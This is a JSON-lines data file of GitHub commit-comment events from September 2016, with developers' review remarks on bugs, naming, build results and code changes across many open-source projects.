{"id":"4550244897","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18987178,"position":null,"line":null,"path":null,"commit_id":"470c342dd2dbf9748ef3b5fd11d12b1b1f8bf0e6","created_at":"2016-09-12T16:05:51Z","updated_at":"2016-09-12T16:05:51Z","body":"Foundation is done, but up to step 2 only."}},"created_at":"2016-09-12T16:05:51Z"}
{"id":"4550247268","type":"CommitCommentEvent","actor":{"login":"goetzc"},"repo":{"name":"mate-desktop/libmateweather"},"payload":{"comment":{"id":18987184,"position":null,"line":null,"path":null,"commit_id":"835055e0d0b950d3f66ad236de7e40942f6f7d8e","created_at":"2016-09-12T16:06:16Z","updated_at":"2016-09-12T16:06:16Z","body":"The comment on this commit said that libgweather added yahoo as a provider https://github.com/mate-desktop/libmateweather/commit/c8a7ad7f0698d2a11d3d5d8c55a9dc5ce9330f46. It also seems that it uses Geocode to find the location automatically.\r\n\r\nWould it be feasible to use libgweather instead of libmateweather?"}},"created_at":"2016-09-12T16:06:16Z"}
{"id":"4550247962","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"kytos/python-openflow"},"payload":{"comment":{"id":18987185,"position":44,"line":74,"path":"pyof/v0x04/common/action.py","commit_id":"9f419afed82599a620b5c619ff5d037f197eeee6","created_at":"2016-09-12T16:06:23Z","updated_at":"2016-09-12T16:06:23Z","body":"Is it right? Two enum items with the same value?"}},"created_at":"2016-09-12T16:06:23Z"}
{"id":"4550256393","type":"CommitCommentEvent","actor":{"login":"greatislander"},"repo":{"name":"pressbooks/pressbooks"},"payload":{"comment":{"id":18987208,"position":106,"line":106,"path":"includes/modules/themeoptions/sections/class-pb-weboptions.php","commit_id":"3463e3f915d63922605838dfdc864d1db5a9f5ae","created_at":"2016-09-12T16:07:50Z","updated_at":"2016-09-12T16:07:50Z","body":"The a11y font size control is now enabled on all books by default. See: https://github.com/pressbooks/pressbooks/commit/24fc44293c4b146f042fa0cb11d9226e3ae951f9"}},"created_at":"2016-09-12T16:07:50Z"}
{"id":"4550257624","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18987212,"position":null,"line":null,"path":null,"commit_id":"999d1f4d1bc29fcd1d98b41d17c9cf2c843127b3","created_at":"2016-09-12T16:08:03Z","updated_at":"2016-09-12T16:08:03Z","body":"I GIVE UP NOW, THERE ARE SO MANY ERRORS, I DON'T THINK YOU CAN USE A CASE INSIDE A CASE!!!!!"}},"created_at":"2016-09-12T16:08:03Z"}
{"id":"4550257943","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18987213,"position":null,"line":null,"path":null,"commit_id":"999d1f4d1bc29fcd1d98b41d17c9cf2c843127b3","created_at":"2016-09-12T16:08:07Z","updated_at":"2016-09-12T16:08:07Z","body":"GOOD LUCK!"}},"created_at":"2016-09-12T16:08:07Z"}
{"id":"4550259983","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"kytos/python-openflow"},"payload":{"comment":{"id":18987217,"position":103,"line":232,"path":"pyof/v0x04/common/action.py","commit_id":"9f419afed82599a620b5c619ff5d037f197eeee6","created_at":"2016-09-12T16:08:28Z","updated_at":"2016-09-12T16:08:28Z","body":"@cemsbr the ``action_type``  attribute of ``ActionOutput`` class is pre-defined right? If so, it should not be passed on the ``__init__`` method."}},"created_at":"2016-09-12T16:08:28Z"}
{"id":"4550261411","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"kytos/python-openflow"},"payload":{"comment":{"id":18987224,"position":112,"line":241,"path":"pyof/v0x04/common/action.py","commit_id":"9f419afed82599a620b5c619ff5d037f197eeee6","created_at":"2016-09-12T16:08:44Z","updated_at":"2016-09-12T16:08:44Z","body":"Same from above comment here."}},"created_at":"2016-09-12T16:08:44Z"}
{"id":"4550262946","type":"CommitCommentEvent","actor":{"login":"jamadden"},"repo":{"name":"zopefoundation/ZODB"},"payload":{"comment":{"id":18987226,"position":6,"line":641,"path":"src/ZODB/DB.py","commit_id":"ca9939ebcccd9734280c2aa2e76319ef63e5fb0d","created_at":"2016-09-12T16:08:59Z","updated_at":"2016-09-12T16:08:59Z","body":"This actually struck me as a potentially nasty bug unless I missed something:\r\n\r\n- Open a Connection with a custom transaction manager.\r\n- Close the transaction so that it goes back in the pool.\r\n- Start a new transaction with the custom transaction manager.\r\n- Close the DB.\r\n- BOOM---your custom transaction from the custom transaction manager is mysteriously aborted."}},"created_at":"2016-09-12T16:08:59Z"}
{"id":"4550265405","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18987233,"position":76,"line":134,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-12T16:09:25Z","updated_at":"2016-09-12T16:09:25Z","body":"I agree with @wibs here. `setUpDataModel` implies that it's setting up a data model, but really it's setting up the whole stack and it's just using a data model with a particular name. `setUp(dataModelName:` is more clear, but it doesn't form a grammatically fluent phrase at the call site. The guidelines state:\r\n\r\n> Prefer method and function names that make use sites form grammatical English phrases.\r\n\r\nSo, I think including \"with\" for the first parameter makes sense. Also, that first argument should be the only argument that requires the preposition since continuing this pattern with the rest of the arguments doesn't really add anything. The guidelines also mention this:\r\n\r\n> It is acceptable for fluency to degrade after the first argument or two when those arguments are not central to the call’s meaning\r\n\r\nWith this in mind, I think we should go with:\r\n\r\n```\r\nsetUp(withDataModelName dataModelName: String, dataModelBundle: Bundle, persistentStoreName: String, persistentStoreType: PersistentStoreType = .sqLite)\r\n```"}},"created_at":"2016-09-12T16:09:25Z"}
{"id":"4550266654","type":"CommitCommentEvent","actor":{"login":"brechmos-stsci"},"repo":{"name":"STScI-JWST/jwst"},"payload":{"comment":{"id":18987235,"position":5,"line":329,"path":"jwst/assign_wcs/nirspec.py","commit_id":"7588668b44b77486cdafb35f7e2eb2dcfa7d1b63","created_at":"2016-09-12T16:09:38Z","updated_at":"2016-09-12T16:09:38Z","body":"argh.  Looked at that a few times and my head was going in the wrong direction, too many negations. You are correct."}},"created_at":"2016-09-12T16:09:38Z"}
{"id":"4550268725","type":"CommitCommentEvent","actor":{"login":"jimfulton"},"repo":{"name":"zopefoundation/ZODB"},"payload":{"comment":{"id":18987238,"position":64,"line":275,"path":"doc/guide/transactions-and-threading.rst","commit_id":"f5bf3ed7b387976096ec6006e58d812e10cefe6c","created_at":"2016-09-12T16:09:59Z","updated_at":"2016-09-12T16:09:59Z","body":"Sure. habit."}},"created_at":"2016-09-12T16:09:59Z"}
{"id":"4550268772","type":"CommitCommentEvent","actor":{"login":"poizan42"},"repo":{"name":"Athas/EggsML"},"payload":{"comment":{"id":18987240,"position":null,"line":null,"path":null,"commit_id":"cd891543361f6c9823d593c1bdd2d3d7b85ab7ed","created_at":"2016-09-12T16:10:00Z","updated_at":"2016-09-12T16:10:00Z","body":"Hvorfor ikke implementere en månefasealgoritme selv? http://bazaar.launchpad.net/~keturn/py-moon-phase/trunk/annotate/head:/moon.py kunne bruges som udgangspunkt. Jeg er sikker på shell-script vil være endnu mere uegnet til det, så det må jo være godt"}},"created_at":"2016-09-12T16:10:00Z"}
{"id":"4550273032","type":"CommitCommentEvent","actor":{"login":"jimfulton"},"repo":{"name":"zopefoundation/ZODB"},"payload":{"comment":{"id":18987250,"position":103,"line":314,"path":"doc/guide/transactions-and-threading.rst","commit_id":"f5bf3ed7b387976096ec6006e58d812e10cefe6c","created_at":"2016-09-12T16:10:43Z","updated_at":"2016-09-12T16:10:43Z","body":"period"}},"created_at":"2016-09-12T16:10:43Z"}
{"id":"4550273620","type":"CommitCommentEvent","actor":{"login":"nmschulte"},"repo":{"name":"i3/i3"},"payload":{"comment":{"id":18987252,"position":68,"line":118,"path":"testcases/t/264-keypress-numlock.t","commit_id":"0469716fd6cbe22916b1f7a0cc8193f6025e8405","created_at":"2016-09-12T16:10:49Z","updated_at":"2016-09-12T16:10:49Z","body":"`s/exactly 4/exactly 6/` -- ??"}},"created_at":"2016-09-12T16:10:49Z"}
{"id":"4550274077","type":"CommitCommentEvent","actor":{"login":"benR123"},"repo":{"name":"benR123/Hill-262"},"payload":{"comment":{"id":18987254,"position":null,"line":null,"path":null,"commit_id":"dda89a11c3b72cfd66299ccc3946f22adaa7587d","created_at":"2016-09-12T16:10:54Z","updated_at":"2016-09-12T16:10:54Z","body":"Three videos showing off the Hill 262 level from start to finish. The videos are in three parts to make uploading more manageable. "}},"created_at":"2016-09-12T16:10:54Z"}
{"id":"4550275377","type":"CommitCommentEvent","actor":{"login":"nmschulte"},"repo":{"name":"i3/i3"},"payload":{"comment":{"id":18987258,"position":92,"line":162,"path":"testcases/t/264-keypress-numlock.t","commit_id":"0469716fd6cbe22916b1f7a0cc8193f6025e8405","created_at":"2016-09-12T16:11:10Z","updated_at":"2016-09-12T16:11:10Z","body":"'s/exactly 5/exactly 7/` -- ??"}},"created_at":"2016-09-12T16:11:10Z"}
{"id":"4550275846","type":"CommitCommentEvent","actor":{"login":"miguel152mm"},"repo":{"name":"miguel152mm/proyecto"},"payload":{"comment":{"id":18987260,"position":null,"line":null,"path":null,"commit_id":"bfb69dc2b92a934e59960098a30dbf07fe326e11","created_at":"2016-09-12T16:11:16Z","updated_at":"2016-09-12T16:11:16Z","body":"musica"}},"created_at":"2016-09-12T16:11:16Z"}
{"id":"4550278045","type":"CommitCommentEvent","actor":{"login":"sglanzer"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18987265,"position":7,"line":7,"path":"object-browser-example.hbs","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T16:11:37Z","updated_at":"2016-09-12T16:11:37Z","body":"This is an interesting point - I'd prefer that the config object passed to the object browser interface contain everything necessary (this is how we're structuring other interfaces).  This doesn't mean that it needs to be part of the bunsen specification (it could still be defined in the controller) but rather that we wire it via the config object into the template interface"}},"created_at":"2016-09-12T16:11:37Z"}
{"id":"4550280623","type":"CommitCommentEvent","actor":{"login":"n0p"},"repo":{"name":"andrewc12/debian-playbooks"},"payload":{"comment":{"id":18987274,"position":7,"line":7,"path":"roles/openwrt-wireless/templates/wireless.default.j2","commit_id":"5d5a0a2d390ec6c04ebdacc0b0a0f2ba5152159c","created_at":"2016-09-12T16:12:04Z","updated_at":"2016-09-12T16:12:04Z","body":"It's not a good idea to use 40Mhz channels on 2.4Ghz\r\n"}},"created_at":"2016-09-12T16:12:04Z"}
{"id":"4550284783","type":"CommitCommentEvent","actor":{"login":"SilverFire"},"repo":{"name":"yiisoft/yii2-framework"},"payload":{"comment":{"id":18987276,"position":null,"line":null,"path":null,"commit_id":"17f7fc4d4faa907c3f5eb0fda5b7fa672fef0fd3","created_at":"2016-09-12T16:12:48Z","updated_at":"2016-09-12T16:12:48Z","body":"Confessing :)"}},"created_at":"2016-09-12T16:12:48Z"}
{"id":"4550285662","type":"CommitCommentEvent","actor":{"login":"aitimxin"},"repo":{"name":"aitimxin/aitimxin.github.com"},"payload":{"comment":{"id":18987278,"position":null,"line":null,"path":null,"commit_id":"d4439cbb99eddfeb0aef9c6ddcdf1197e7746ccf","created_at":"2016-09-12T16:12:57Z","updated_at":"2016-09-12T16:12:57Z","body":"test"}},"created_at":"2016-09-12T16:12:57Z"}
{"id":"4550285890","type":"CommitCommentEvent","actor":{"login":"sglanzer"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18987279,"position":59,"line":43,"path":"object-browser-schema.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T16:13:00Z","updated_at":"2016-09-12T16:13:00Z","body":"I'd drop 'always' and 'never', unless there is a condition attached every button is 'always' and 'never' doesn't make sense since why would you have the button?"}},"created_at":"2016-09-12T16:13:00Z"}
{"id":"4550287991","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18987282,"position":null,"line":null,"path":null,"commit_id":"9d6b9469f4ac94c2cbe83a8b11124a0819149f1a","created_at":"2016-09-12T16:13:21Z","updated_at":"2016-09-12T16:13:21Z","body":"Build report #159355269 for sha 9d6b9469f4ac94c2cbe83a8b11124a0819149f1a:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1785%20/%208398%20%2821.26%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-13.96%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T16:13:21Z"}
{"id":"4550288942","type":"CommitCommentEvent","actor":{"login":"n0p"},"repo":{"name":"andrewc12/debian-playbooks"},"payload":{"comment":{"id":18987287,"position":null,"line":null,"path":null,"commit_id":"5d5a0a2d390ec6c04ebdacc0b0a0f2ba5152159c","created_at":"2016-09-12T16:13:31Z","updated_at":"2016-09-12T16:13:31Z","body":"What are you trying to accomplish with this role? \r\nThis will fail on debian boxes.\r\nI think it's better to separate this into a different playbook, don't you think so?\r\n\r\nTake a look here:\r\nhttps://github.com/lefant/ansible-openwrt"}},"created_at":"2016-09-12T16:13:31Z"}
{"id":"4550295598","type":"CommitCommentEvent","actor":{"login":"jeremyckahn"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":18987304,"position":null,"line":null,"path":null,"commit_id":"bb76f24af2010943387ce696a7092175b4ecccf2","created_at":"2016-09-12T16:14:42Z","updated_at":"2016-09-12T16:14:42Z","body":"Congrats on releasing 8.0! 🎉"}},"created_at":"2016-09-12T16:14:42Z"}
{"id":"4550295728","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"SirVer/ultisnips"},"payload":{"comment":{"id":18987305,"position":null,"line":null,"path":null,"commit_id":"8d77e89d65d5678d3c9b15496e462ab5b8ebd8e9","created_at":"2016-09-12T16:14:44Z","updated_at":"2016-09-12T16:14:44Z","body":"@noscripter \r\nWhat does `:verb au FileType *` say?"}},"created_at":"2016-09-12T16:14:44Z"}
{"id":"4550296619","type":"CommitCommentEvent","actor":{"login":"jswrenn"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18987307,"position":null,"line":null,"path":null,"commit_id":"0247aa65275b8b3f505fd29044f3a0d4f14c26ba","created_at":"2016-09-12T16:14:53Z","updated_at":"2016-09-12T16:14:53Z","body":"<a href=\"https://gfycat.com/RectangularAdorableGourami\"><video poster=\"https://thumbs.gfycat.com/RectangularAdorableGourami-poster.jpg\" autoplay muted loop controls><source id=\"webmSource\" src=\"https://zippy.gfycat.com/RectangularAdorableGourami.webm\" type=\"video/webm\"><source id=\"mp4Source\" src=\"https://zippy.gfycat.com/RectangularAdorableGourami.mp4\" type=\"video/mp4\"><img title=\"Sorry, your browser doesn't support HTML5 video.\" src=\"https://thumbs.gfycat.com/RectangularAdorableGourami-poster.jpg\"></video></a>"}},"created_at":"2016-09-12T16:14:53Z"}
{"id":"4550297692","type":"CommitCommentEvent","actor":{"login":"gut"},"repo":{"name":"PPC64/hhvm"},"payload":{"comment":{"id":18987310,"position":8,"line":147,"path":"hphp/hack/src/heap/hh_shared.c","commit_id":"da73c736615fc493bf89c022e7fa8adb37b95bca","created_at":"2016-09-12T16:15:04Z","updated_at":"2016-09-12T16:15:04Z","body":"Wait, if `SYS_memfd_create` is already set on PPC64 environment, why didn't you avoid redefining it here instead of changing every other symbol? I guess a simple `#ifndef SYS_memfd_create` guard around the original symbol would be enough, right?"}},"created_at":"2016-09-12T16:15:04Z"}
{"id":"4550297873","type":"CommitCommentEvent","actor":{"login":"angelniebla"},"repo":{"name":"angelniebla/NOMBRE.txt"},"payload":{"comment":{"id":18987311,"position":null,"line":null,"path":null,"commit_id":"7ca77fb81877e24e96e1031655882064d9ecc740","created_at":"2016-09-12T16:15:07Z","updated_at":"2016-09-12T16:15:07Z","body":"Niebla Montero, Angel\r\nangelniebla\r\nangel.niebla"}},"created_at":"2016-09-12T16:15:07Z"}
{"id":"4550301367","type":"CommitCommentEvent","actor":{"login":"wm4"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":18987319,"position":null,"line":null,"path":null,"commit_id":"c15764101943e93ea9e8223596d8a6a2571494c3","created_at":"2016-09-12T16:15:41Z","updated_at":"2016-09-12T16:15:41Z","body":"Or `--chapter`, which takes a range."}},"created_at":"2016-09-12T16:15:41Z"}
{"id":"4550304878","type":"CommitCommentEvent","actor":{"login":"timiles"},"repo":{"name":"noobot/noobot"},"payload":{"comment":{"id":18987327,"position":null,"line":null,"path":null,"commit_id":"975fc4ad80698ea5a372e3f7af5b7342a7bbe539","created_at":"2016-09-12T16:16:18Z","updated_at":"2016-09-12T16:16:18Z","body":":)"}},"created_at":"2016-09-12T16:16:18Z"}
{"id":"4550306650","type":"CommitCommentEvent","actor":{"login":"Breech99"},"repo":{"name":"Vdauphin/HeartsAndMinds"},"payload":{"comment":{"id":18987330,"position":null,"line":null,"path":null,"commit_id":"c08ac07d56f5f4b7c21d15aeb2f6f07cb5bb876c","created_at":"2016-09-12T16:16:35Z","updated_at":"2016-09-12T16:16:35Z","body":"Dead bodies of military insurgents are no longer searchable. I only get the ace interaction to do medical treatment after latest update. v1.15 stable branch. Worked as of recent. Only last patch with 2 file changes caused issue. "}},"created_at":"2016-09-12T16:16:35Z"}
{"id":"4550309453","type":"CommitCommentEvent","actor":{"login":"Breech99"},"repo":{"name":"Vdauphin/HeartsAndMinds"},"payload":{"comment":{"id":18987336,"position":null,"line":null,"path":null,"commit_id":"c08ac07d56f5f4b7c21d15aeb2f6f07cb5bb876c","created_at":"2016-09-12T16:17:04Z","updated_at":"2016-09-12T16:17:04Z","body":"No search for intel appears but does have ace interaction is what I mean."}},"created_at":"2016-09-12T16:17:04Z"}
{"id":"4550310545","type":"CommitCommentEvent","actor":{"login":"asr"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":18987338,"position":null,"line":null,"path":null,"commit_id":"04981808ea6720b24b91322cc4ad8568b14321b0","created_at":"2016-09-12T16:17:16Z","updated_at":"2016-09-12T16:17:16Z","body":"I created a (temporal) test case:\r\n\r\n```\r\n$ cd test/Compiler/simple\r\n$ agda-2.5.2 --ignore-interfaces -c Issue2169.agda\r\n$ ./Issue2619\r\n-0.0  = 0.0\r\n```\r\n\r\n> If so what does the generated code say?\r\n\r\n```bash\r\n$ cat MAlonzo/Code/Issue2169.hs\r\n```\r\n\r\n```haskell\r\n{-# LANGUAGE EmptyDataDecls, ExistentialQuantification,\r\n             ScopedTypeVariables, NoMonomorphismRestriction, Rank2Types #-}\r\nmodule MAlonzo.Code.Issue2169 where\r\n\r\nimport MAlonzo.RTE (coe, erased, addInt, subInt, mulInt, quotInt,\r\n                    remInt, geqInt, ltInt, eqInt)\r\nimport qualified Data.Text.IO\r\nimport qualified MAlonzo.RTE\r\nimport qualified Data.Text\r\nimport qualified MAlonzo.Code.Agda.Builtin.Float\r\nimport qualified MAlonzo.Code.Common.IO\r\n\r\nname2 = \"Issue2169.print\"\r\nd2 v0\r\n  = coe\r\n      MAlonzo.Code.Common.IO.d26\r\n      (coe MAlonzo.Code.Agda.Builtin.Float.d36 v0)\r\nmain = d6\r\nname6 = \"Issue2169.main\"\r\nd6\r\n  = coe\r\n      MAlonzo.Code.Common.IO.du80 () ()\r\n      (coe MAlonzo.Code.Common.IO.d20 (coe Data.Text.pack \"-0.0  = \"))\r\n      (coe\r\n         MAlonzo.Code.Common.IO.du80 () () (coe d2 (0.0 :: Double))\r\n         (coe MAlonzo.Code.Common.IO.d8 () erased erased))\r\n```\r\n"}},"created_at":"2016-09-12T16:17:16Z"}
{"id":"4550313851","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18987344,"position":null,"line":null,"path":null,"commit_id":"ac22efcbf0eb13d5963fc20a3ca916dbca0272ca","created_at":"2016-09-12T16:17:47Z","updated_at":"2016-09-12T16:17:47Z","body":"It's not just on 'token' page, or register etc ....? No ?\r\n\r\nSee : https://bugs.limesurvey.org/view.php?id=11647\r\n\r\n"}},"created_at":"2016-09-12T16:17:47Z"}
{"id":"4550314202","type":"CommitCommentEvent","actor":{"login":"ebeshero"},"repo":{"name":"ebeshero/DHClass-Hub"},"payload":{"comment":{"id":18987345,"position":null,"line":null,"path":null,"commit_id":"34634a29065e4c1671faf98b66c85709853f4be9","created_at":"2016-09-12T16:17:52Z","updated_at":"2016-09-12T16:17:52Z","body":"It's up! 👍 "}},"created_at":"2016-09-12T16:17:52Z"}
{"id":"4550318163","type":"CommitCommentEvent","actor":{"login":"greatislander"},"repo":{"name":"pressbooks/pressbooks"},"payload":{"comment":{"id":18987355,"position":106,"line":106,"path":"includes/modules/themeoptions/sections/class-pb-weboptions.php","commit_id":"3463e3f915d63922605838dfdc864d1db5a9f5ae","created_at":"2016-09-12T16:18:33Z","updated_at":"2016-09-12T16:18:33Z","body":"I see the issue—there was a conditional check that I missed in `content-accessibility-toolbar.php`. Fixed in https://github.com/pressbooks/pressbooks/commit/742abcf329014b1d830478a11fd1a5bb6c7d965a. Thanks for spotting.\r\n\r\n(You may recall that I brought up this change in the open source call a few weeks ago, specifically in reference to building out more accessibility controls in collaboration with the Inclusive Design folks.)"}},"created_at":"2016-09-12T16:18:33Z"}
{"id":"4550324859","type":"CommitCommentEvent","actor":{"login":"MichMich"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":18987368,"position":null,"line":null,"path":null,"commit_id":"ae37fa2bc598301c69688c78a9adb0e270ad66ef","created_at":"2016-09-12T16:19:42Z","updated_at":"2016-09-12T16:19:42Z","body":"On the Mirror or in the feed?"}},"created_at":"2016-09-12T16:19:42Z"}
{"id":"4550326849","type":"CommitCommentEvent","actor":{"login":"GustavoRuiz9"},"repo":{"name":"GustavoRuiz9/Test"},"payload":{"comment":{"id":18987377,"position":null,"line":null,"path":null,"commit_id":"977f8a87e783992a5c82e98106f4af61150d7ccf","created_at":"2016-09-12T16:20:02Z","updated_at":"2016-09-12T16:20:02Z","body":"nada"}},"created_at":"2016-09-12T16:20:02Z"}
{"id":"4550330379","type":"CommitCommentEvent","actor":{"login":"fernandosouza"},"repo":{"name":"metal/metal.js"},"payload":{"comment":{"id":18987393,"position":null,"line":null,"path":null,"commit_id":"dad80412eeba242b70380fdc726708b45b8e1748","created_at":"2016-09-12T16:20:38Z","updated_at":"2016-09-12T16:20:38Z","body":"Hey, guys. What are the implications of this changes?"}},"created_at":"2016-09-12T16:20:38Z"}
{"id":"4550332491","type":"CommitCommentEvent","actor":{"login":"jimfulton"},"repo":{"name":"zopefoundation/ZODB"},"payload":{"comment":{"id":18987396,"position":6,"line":641,"path":"src/ZODB/DB.py","commit_id":"ca9939ebcccd9734280c2aa2e76319ef63e5fb0d","created_at":"2016-09-12T16:21:01Z","updated_at":"2016-09-12T16:21:01Z","body":"Yeah. That looks like it's still a bug.  This PR partly mitigates it.  I think it would be better if the database force-closed the connections, which would error if they were joined to any transactions. Likely to cause test pain and agony. :)"}},"created_at":"2016-09-12T16:21:01Z"}
{"id":"4550335660","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18987407,"position":null,"line":null,"path":null,"commit_id":"151ea3fa034bb6bcf18f1fc70c5ae2cb678d8fa8","created_at":"2016-09-12T16:21:37Z","updated_at":"2016-09-12T16:21:37Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 251](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1207&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:30:02"}},"created_at":"2016-09-12T16:21:37Z"}
{"id":"4550335772","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18987408,"position":null,"line":null,"path":null,"commit_id":"415ffe4bc366b882336a361cc914206f1b724163","created_at":"2016-09-12T16:21:38Z","updated_at":"2016-09-12T16:21:38Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 252](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1208&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T16:21:38Z"}
{"id":"4550339645","type":"CommitCommentEvent","actor":{"login":"jbialobr"},"repo":{"name":"Maximus5/conemu-inside"},"payload":{"comment":{"id":18987419,"position":4,"line":20,"path":"ConEmuWinForms/Util/CommandLineBuilder.cs","commit_id":"857eb7c45f0ded41eab214faa36d13fe7c9960d2","created_at":"2016-09-12T16:22:19Z","updated_at":"2016-09-12T16:22:19Z","body":"GitExtensions is .net 4.0 targeted and Microsoft.Build.Utilities.Core requires 4.5.\r\nWe can copy CommandLineBuilder.cs from MS as it is done here or make the conemu-inside a submodule and include it to GitExt solution to have a better control over the source code."}},"created_at":"2016-09-12T16:22:19Z"}
{"id":"4550341486","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"psylone/train_manager"},"payload":{"comment":{"id":18987425,"position":3,"line":3,"path":"db/migrate/20160911174927_add_name_to_railway_stations.rb","commit_id":"630a756dc2f91d691eca016aa229732bccbab196","created_at":"2016-09-12T16:22:39Z","updated_at":"2016-09-12T16:22:39Z","body":"Добавить колонку с ограничением целостности `null: false` и не указать значение `default` не получается. Можно обойти это так:\r\n\r\n```ruby\r\ndef change\r\n  add_column         :railway_stations, :name, :string\r\n  change_column_null :railway_stations, :name, false\r\nend\r\n```"}},"created_at":"2016-09-12T16:22:39Z"}
{"id":"4550341825","type":"CommitCommentEvent","actor":{"login":"achafetz"},"repo":{"name":"achafetz/PartnerProgress"},"payload":{"comment":{"id":18987427,"position":null,"line":null,"path":null,"commit_id":"12e9ec265454c56dc07f3e6d55024ac80c8f5fbd","created_at":"2016-09-12T16:22:43Z","updated_at":"2016-09-12T16:22:43Z","body":"@jaliasd Quick question about your last update. You added the `otherdisagg` in creating the subset of  `key_ind` (below) \r\n\r\n````inlist(age, \"10-14\", \"15-17\", \"18-24\")) | inlist(otherdisaggregate, \"Economic Strengthening\", \"Education Support\", \"Other Service Areas\", /// \"Parenting/Caregiver Programs\", \"Social Protection\")  | /// ````\r\n\r\nShould the ` inlist(otherdisaggregate...)` portion be part of the OVC snippet? So, do we want the dataset to include OVC between 10-24 as well as any OVC with the `otherdisaggregate` within your list? or do we want the combination of `age` and `otherdisaggregate`? I think its the latter, which would change the code to this:\r\n\r\n````inlist(age, \"10-14\", \"15-17\", \"18-24\") & inlist(otherdisaggregate, \"Economic Strengthening\", \"Education Support\", \"Other Service Areas\", /// \"Parenting/Caregiver Programs\", \"Social Protection\"))  | /// ````\r\n\r\nThe difference in count of observations identified as a `key_ind` between the OR (current) compared with AND is 194,013 v  151,115 (for the first replace command)"}},"created_at":"2016-09-12T16:22:43Z"}
{"id":"4550343818","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18987432,"position":null,"line":null,"path":null,"commit_id":"415ffe4bc366b882336a361cc914206f1b724163","created_at":"2016-09-12T16:23:08Z","updated_at":"2016-09-12T16:23:08Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 252](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1208&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:01:29"}},"created_at":"2016-09-12T16:23:08Z"}
{"id":"4550345662","type":"CommitCommentEvent","actor":{"login":"VanDalkvist"},"repo":{"name":"angular-learning/project-tracker"},"payload":{"comment":{"id":18987440,"position":22,"line":39,"path":"public/js/app.route.module.js","commit_id":"d4b82591f7c13e4d53b07eadefa004dbdf5703d7","created_at":"2016-09-12T16:23:26Z","updated_at":"2016-09-12T16:23:26Z","body":"It was just an example. Please remove it"}},"created_at":"2016-09-12T16:23:26Z"}
{"id":"4550345711","type":"CommitCommentEvent","actor":{"login":"nicolas-cellier-aka-nice"},"repo":{"name":"estebanlm/opensmalltalk-vm"},"payload":{"comment":{"id":18987441,"position":127,"line":3249,"path":"platforms/win32/vm/sqWin32Window.c","commit_id":"e24f4da5a82e2b37a3e3274801ff52b4c5ed0685","created_at":"2016-09-12T16:23:27Z","updated_at":"2016-09-12T16:23:27Z","body":"Hi Esteban, this won't work in UNICODE version\r\nThis should be written:\r\n\r\n    abortMessage(TEXT(\"Usage: \") TEXT(VM_NAME) TEXT(\" [options] <imageFile>\"));\r\n\r\nSee two lines below and commit https://github.com/estebanlm/opensmalltalk-vm/commit/8814acea652086accfc86f0a54d51b6302e47a84"}},"created_at":"2016-09-12T16:23:27Z"}
{"id":"4550345839","type":"CommitCommentEvent","actor":{"login":"White-Oak"},"repo":{"name":"dtolnay/syn"},"payload":{"comment":{"id":18987442,"position":null,"line":null,"path":null,"commit_id":"1521119acf7bf35aa976dc4a7559733451731aac","created_at":"2016-09-12T16:23:28Z","updated_at":"2016-09-12T16:23:28Z","body":"You may want to include this link in README as well"}},"created_at":"2016-09-12T16:23:28Z"}
